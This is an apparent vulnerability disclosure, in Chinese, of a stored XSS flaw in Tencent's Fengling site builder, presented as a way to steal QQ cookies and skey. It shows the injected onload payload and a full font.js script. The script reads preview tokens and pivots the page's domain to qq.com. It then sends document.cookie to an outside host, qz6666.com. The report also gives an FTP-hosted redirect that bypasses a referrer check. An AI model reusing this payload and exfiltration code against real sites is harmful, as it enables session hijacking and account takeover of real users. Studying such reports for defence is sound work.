腾讯某站XSS漏洞可获取cookie/skey（点击一下上你的各种qq业务）

风铃建站，桌面版预览，没有过滤QQ客服组件自上传图片url，效果页面：

http://qz6666.com/iframe.html

http://preview.flzhan.com/default/preview?mode=pc&siteId=2000685651&url=http%3A%2F%2Fpreview.flzhan.com%2Fpreview%2Fpreview%2F2000685651%2Findex.html%3Fmode%3Dpc

1.风铃建站，选择桌面模板创建网站

http://zhan.qq.com/default/tpl?screen=1&type=1



2.编辑，组件，添加QQ客服，组件设置中自己上传图片并在保存时抓包，更改src

http://fl.cdn.qq.com/transition/51/2000685651/982/82044509425637198825458012571080.png#\" onload=\"var s=document.createElement('script');s.src='http://qz6666.com/font.js';document.body.appendChild(s);



3.预览，会跳转到带有token的url，token会失效，XSS获取的cookie也是flzhan.com域的

http://preview.flzhan.com/preview/preview/2000685651/index.html?mode=pc&time=1451042318&tk=555d0e28df242f8eb34d757254028a49&r=596752



解决token问题，抓包发现是由一个无token的url跳转的:

http://preview.flzhan.com/default/preview?mode=pc&siteId=2000685651&url=http%3A%2F%2Fpreview.flzhan.com%2Fpreview%2Fpreview%2F2000685651%2Findex.html%3Fmode%3Dpc



解决cookie域问题，从下面文件中看到开头一句话，尝试直接替换url中的域名

code 区域

http://api.zhan.qq.com/default/initJs?siteId=2000685651&page=index&target=preview&v=96196

//若站点域名使用xxx.zhan.qq.com，则设置docunent.domain

var topUrl = window.location.href;

if(topUrl.indexOf('zhan.qq.com')>0){

    document.domain = 'qq.com';

}

发现有效

http://zhan.qq.com/preview/preview/2000685651/index.html?mode=pc&time=1451042318&tk=555d0e28df242f8eb34d757254028a49&r=596752





4.最终思路，预览无token的url，跳转到带token的url，加载xss脚本，获取token，框架加载替换域名url，获取qq.com域cookie

code 区域

font.js

var domain = document.domain;



//第一次加载domain为preview.flzhan.com，第二次加载domain为qq.com

if (domain == 'preview.flzhan.com')

{

	var pre_token = GetCookie('previewTk_2000685651');

	var pre_time = GetCookie('previewTime_2000685651');

	var s = document.createElement('iframe');s.src="http://zhan.qq.com/preview/preview/2000685651/index.html?mode=pc&time="+pre_time+"&tk="+pre_token+"&r="+Math.random()*1000000;s.style.display='none';document.body.appendChild(s);

}else if (domain == "qq.com")

{

	WriteLog();

}



function GetCookie(name) {

	var arr = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));

	if (arr != null) return unescape(arr[2]);

	return null;

}



//没搭XSS平台，下面是xsser.me中直接借的一段代码

function WriteLog(){(new Image()).src='http://qz6666.com/font.asp?do=api&id=u5AqAS&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());}

最后，又有一个问题，页面有判断referrer，必须是*.qq.com或者空，不能隐藏框架形式加载。解决，GG了一个匿名FTP，ftp跨协议：

ftp://218.2.110.212/Webs/Mod_EnvAuto/CommonInfo/bulletininfo/test.html

code 区域

test.html

<script>

window.location="http://preview.flzhan.com/default/preview?mode=pc&siteId=2000685651&url=http%3A%2F%2Fpreview.flzhan.com%2Fpreview%2Fpreview%2F2000685651%2Findex.html%3Fmode%3Dpc";

</script>

最终效果：

http://qz6666.com/iframe.html

漏洞证明：

http://preview.flzhan.com/default/preview?mode=pc&siteId=2000685651&url=http%3A%2F%2Fpreview.flzhan.com%2Fpreview%2Fpreview%2F2000685651%2Findex.html%3Fmode%3Dpc

http://qz6666.com/iframe.html

http://qz6666.com/cook.txt